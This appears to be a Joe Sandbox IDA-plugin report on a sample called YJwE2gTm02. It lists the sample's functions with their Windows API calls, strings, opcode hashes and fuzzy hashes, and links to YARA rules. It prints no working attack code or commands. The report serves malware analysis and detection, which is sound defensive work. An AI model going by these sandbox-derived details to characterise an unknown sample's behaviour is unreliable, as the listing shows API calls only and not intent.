Opcode ID: 1ffda035d7d91d7aa29318b06e721d8ae4b4e11ad812736308f79a384b4a97b7
Instruction ID: eabc984d16a5b5d396e900ff96df6310a1f8c43597c6abca5702ce0b9f689728
Opcode Fuzzy Hash: 1ffda035d7d91d7aa29318b06e721d8ae4b4e11ad812736308f79a384b4a97b7
Instruction Fuzzy Hash: A851C0B4A00609AFDB10CFA8D845AEEBBF9EF4D300F15452AF955E7291D630AA41CF60

Function 00922D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00922D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00922D53
_ValidateLocalCookies.LIBCMT ref: 00922DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00922E0C
_ValidateLocalCookies.LIBCMT ref: 00922E61

Strings

csm, xrefs: 00922DF6

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 36ce3f7e64840fb23cc48a386922283ead4d2199f0b646aae360215755fca376
Instruction ID: 7ea2025bbf70887914ad2adc41948540523f774513fc32bc333185017d390c18
Opcode Fuzzy Hash: 36ce3f7e64840fb23cc48a386922283ead4d2199f0b646aae360215755fca376
Instruction Fuzzy Hash: 7141D434E00228BBCF10DF68EC45AAEBBB5BF85324F148155E8146F396D7359A01CBD0

Function 009810B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0098304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0098307A
Part of subcall function 0098304E: _wcslen.LIBCMT ref: 0098309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00981112
WSAGetLastError.WSOCK32 ref: 00981121
WSAGetLastError.WSOCK32 ref: 009811C9
closesocket.WSOCK32(00000000), ref: 009811F9

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: c1a7e6487c9e66fe9d0178719abcd14bf3b5e30823a1803b848fcc31d386b2ac
Instruction ID: 4c69507f78f016a550c6e4bcdd75667823c1c707d5b32b5990a8e3a0dc6a3f66
Opcode Fuzzy Hash: c1a7e6487c9e66fe9d0178719abcd14bf3b5e30823a1803b848fcc31d386b2ac
Instruction Fuzzy Hash: 4941D271604204AFDB10AF58CC88BAABBEDEF85364F148159F9159B391C774ED82CBA1

Function 0096CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0096CF22,?), ref: 0096DDFD

Part of subcall function 0096DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0096CF22,?), ref: 0096DE16

lstrcmpiW.KERNEL32(?,?), ref: 0096CF45
MoveFileW.KERNEL32(?,?), ref: 0096CF7F
_wcslen.LIBCMT ref: 0096D005
_wcslen.LIBCMT ref: 0096D01B
SHFileOperationW.SHELL32(?), ref: 0096D061

Strings

\*.*, xrefs: 0096CFF3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 246f687ebb179d09cb7462157440eac9e787b5e26bebfaf7c5929f92a46c46c0
Instruction ID: b5594ba3b5a0e61c727f8c6afc36eb80771ec54d52b49123bc6e137399eb5f24
Opcode Fuzzy Hash: 246f687ebb179d09cb7462157440eac9e787b5e26bebfaf7c5929f92a46c46c0
Instruction Fuzzy Hash: B64126B5D452199FDF12EFA4D981BEEB7BDAF48380F1000E6E545EB142EB34A684CB50

Function 00992DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00992E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00992E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00992E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00992EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00992EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00992EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00992F0B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 8c9dc2629a2948a3b631d3fad5582d112559c712cc5e178d17030206d81f426c
Instruction ID: 6502a8b81985229f0c41136d87700155a75557062d3e0d2051b584d2e3842a59
Opcode Fuzzy Hash: 8c9dc2629a2948a3b631d3fad5582d112559c712cc5e178d17030206d81f426c
Instruction Fuzzy Hash: 5B311235659241AFDF21CF9CECD4F6537E8EB8A711F150166F9008B2B2CB71A880EB51

Function 00967726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00967769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0096778F
SysAllocString.OLEAUT32(00000000), ref: 00967792
SysAllocString.OLEAUT32(?), ref: 009677B0
SysFreeString.OLEAUT32(?), ref: 009677B9
StringFromGUID2.OLE32(?,?,00000028), ref: 009677DE
SysAllocString.OLEAUT32(?), ref: 009677EC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a930632647d9b251e06a993ec564ff435fcf95060068cf0ad5f93f9ab8f9478c
Instruction ID: 306e57ef9c51a9dc682a1b19d774a11bd9e265d25ac07c7b39ca8a746a86afab
Opcode Fuzzy Hash: a930632647d9b251e06a993ec564ff435fcf95060068cf0ad5f93f9ab8f9478c
Instruction Fuzzy Hash: 6921C176608219AFDF10DFECCD88DBBB7ACEB093687048426FA05DB160D674DC419764

Function 009677FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00967842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00967868
SysAllocString.OLEAUT32(00000000), ref: 0096786B
SysAllocString.OLEAUT32 ref: 0096788C
SysFreeString.OLEAUT32 ref: 00967895
StringFromGUID2.OLE32(?,?,00000028), ref: 009678AF
SysAllocString.OLEAUT32(?), ref: 009678BD

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a7f18c823c90019ff27e90f334aa21d280d1e8af35d97a68f243e8bb6b4e71a1
Instruction ID: e3d4ba9280e26910673ad7711a4b02301a54fd10445bceff4d330c81f2eb9949
Opcode Fuzzy Hash: a7f18c823c90019ff27e90f334aa21d280d1e8af35d97a68f243e8bb6b4e71a1
Instruction Fuzzy Hash: 3E216071608208AFDB109FECDC88DAAB7ECEB097647108125F915CB2A1D674DC81DB64

Function 009704D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009704F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0097052E

Strings

nul, xrefs: 00970567

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: c289403d6364aacb64559390b6a7f46919a0ed62707b4f4f9ca7ab7960846ac0
Instruction ID: 41cb7c42274c08196cc6bdd215cd2f72b3a0e65895c608ba7c86de2f22a76e86
Opcode Fuzzy Hash: c289403d6364aacb64559390b6a7f46919a0ed62707b4f4f9ca7ab7960846ac0
Instruction Fuzzy Hash: 562160B6500305EBDB209F2ADC45A9E7BA8BFC4724F208A19F8A5D72E0D770D940DF20

Function 009705A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009705C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00970601

Strings

nul, xrefs: 00970639

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: c711d6808051f3a0b2095379f040323405639218d21b9999ae568c8e49defd57
Instruction ID: c3d44470aaebd5fccfe09b228f3f0b7a1ee50c81d4938faf47a1c1cc79c394f7
Opcode Fuzzy Hash: c711d6808051f3a0b2095379f040323405639218d21b9999ae568c8e49defd57
Instruction Fuzzy Hash: 47219076500305DBDB209F69CC54A9A77E8BFD5724F208B1AF8A5E72E0D7B09960DB20

Function 009940AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0090600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0090604C
Part of subcall function 0090600E: GetStockObject.GDI32(00000011), ref: 00906060
Part of subcall function 0090600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0090606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00994112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0099411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0099412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00994139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00994145

Strings

Msctls_Progress32, xrefs: 009940E3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: fa1c41c275aef4ebbbabe572a0e76d5902b056caa941f485382d2672d4c49433
Instruction ID: 11ca779ae7cbcada579d2bc70bdcfc2b3cd558d1d576be65d61ca04b6992883b
Opcode Fuzzy Hash: fa1c41c275aef4ebbbabe572a0e76d5902b056caa941f485382d2672d4c49433
Instruction Fuzzy Hash: 6E11B2B2150219BEEF218F68CC85EE77F6DEF18798F004111BA18A2090C7729C61DBA4

Function 0093D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0093D7A3: _free.LIBCMT ref: 0093D7CC

_free.LIBCMT ref: 0093D82D

Part of subcall function 009329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000), ref: 009329DE
Part of subcall function 009329C8: GetLastError.KERNEL32(00000000,?,0093D7D1,00000000,00000000,00000000,00000000,?,0093D7F8,00000000,00000007,00000000,?,0093DBF5,00000000,00000000), ref: 009329F0

_free.LIBCMT ref: 0093D838
_free.LIBCMT ref: 0093D843
_free.LIBCMT ref: 0093D897
_free.LIBCMT ref: 0093D8A2
_free.LIBCMT ref: 0093D8AD
_free.LIBCMT ref: 0093D8B8

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 4e6336d8b4fac8f57e0e4cf21200e89f4a28353939ad17535ff5f546041b3e5d
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: DF1186B1942B14BAE531BFF0EC47FCB7BDC6F80700F400825B69AA6192DA75B5054F51

Function 0096DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0096DA74
LoadStringW.USER32(00000000), ref: 0096DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0096DA91
LoadStringW.USER32(00000000), ref: 0096DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0096DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0096DAB9

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 05108c52b15a15e49548c880f73e6fd202cbd964f772996bddf058f492d819b9
Instruction ID: 3206236d6cfb34b364283109d415ec957956627b019d8f85c84101c7309a93ff
Opcode Fuzzy Hash: 05108c52b15a15e49548c880f73e6fd202cbd964f772996bddf058f492d819b9
Instruction Fuzzy Hash: 950162F29082087FEB10DBE49D89EEB366CE708301F400896B756E2041E6749E845F74

Function 0097096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0166EB38,0166EB38), ref: 0097097B
EnterCriticalSection.KERNEL32(0166EB18,00000000), ref: 0097098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 0097099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009709A9
CloseHandle.KERNEL32(00000000), ref: 009709B8
InterlockedExchange.KERNEL32(0166EB38,000001F6), ref: 009709C8
LeaveCriticalSection.KERNEL32(0166EB18), ref: 009709CF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7629bfb78fcbf3095003aee45ab8b2a2dd954dacb3ff14f6e2f8df0f0dc00d5c
Instruction ID: 2d8bbe51ab9f24426eef79dc53531eff794a5dae11ff45f60052a8d9f713bd24
Opcode Fuzzy Hash: 7629bfb78fcbf3095003aee45ab8b2a2dd954dacb3ff14f6e2f8df0f0dc00d5c
Instruction Fuzzy Hash: 06F03172456902FBD7515FA8EE8DBDA7B39FF41702F801016F201508A0C775E465DFA0

Function 00981C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00981DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00981DE1
WSAGetLastError.WSOCK32 ref: 00981DF2
htons.WSOCK32(?,?,?,?,?), ref: 00981EDB
inet_ntoa.WSOCK32(?), ref: 00981E8C

Part of subcall function 009639E8: _strlen.LIBCMT ref: 009639F2

Part of subcall function 00983224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0097EC0C), ref: 00983240

_strlen.LIBCMT ref: 00981F35

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 1e21c37032bef7706941a1e82ed2c5fd0c23bf844fb033e0ec32f022dfcca9b6
Instruction ID: d73dea7bd52f1dfef0aff8b60354b36fb1e3bf76ae6f31ea43b8866e93631471
Opcode Fuzzy Hash: 1e21c37032bef7706941a1e82ed2c5fd0c23bf844fb033e0ec32f022dfcca9b6
Instruction Fuzzy Hash: 83B18971204240AFD324EB24C895F2A7BA9AF84318F54894CF55A5B3E2DB71ED82CB91

Function 00905D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00905D30
GetWindowRect.USER32(?,?), ref: 00905D71
ScreenToClient.USER32(?,?), ref: 00905D99
GetClientRect.USER32(?,?), ref: 00905ED7
GetWindowRect.USER32(?,?), ref: 00905EF8

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 02da9963a36dad7475635ca9f93bc333232c4bc02a79c0e5fc524abdc8864ee2
Instruction ID: b5e7c143251b4ee01e45466b7233b7c066ab8394300dcffba44a062ccf617861
Opcode Fuzzy Hash: 02da9963a36dad7475635ca9f93bc333232c4bc02a79c0e5fc524abdc8864ee2
Instruction Fuzzy Hash: E3B15874A0064AEFDB14CFA8C440BEAB7F5FF48310F14881AE8A9D7290DB34AA51DB50

Function 009301B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 009300BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009300D6
__allrem.LIBCMT ref: 009300ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0093010B
__allrem.LIBCMT ref: 00930122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00930140

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 31cc8592d9f090f2f41bf68e58e8f7b7e01af67175f6b8ba4694b4b2d20f386e
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: C0810472A007169BE724AF68DC62BAB73F8EFC1724F24463AF551D6681E774D9008F90

Function 009361FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009282D9,009282D9,?,?,?,0093644F,00000001,00000001,8BE85006), ref: 00936258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0093644F,00000001,00000001,8BE85006,?,?,?), ref: 009362DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009363D8
__freea.LIBCMT ref: 009363E5

Part of subcall function 00933820: RtlAllocateHeap.NTDLL(00000000,?,009D1444,?,0091FDF5,?,?,0090A976,00000010,009D1440,009013FC,?,009013C6,?,00901129), ref: 00933852

__freea.LIBCMT ref: 009363EE
__freea.LIBCMT ref: 00936413

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
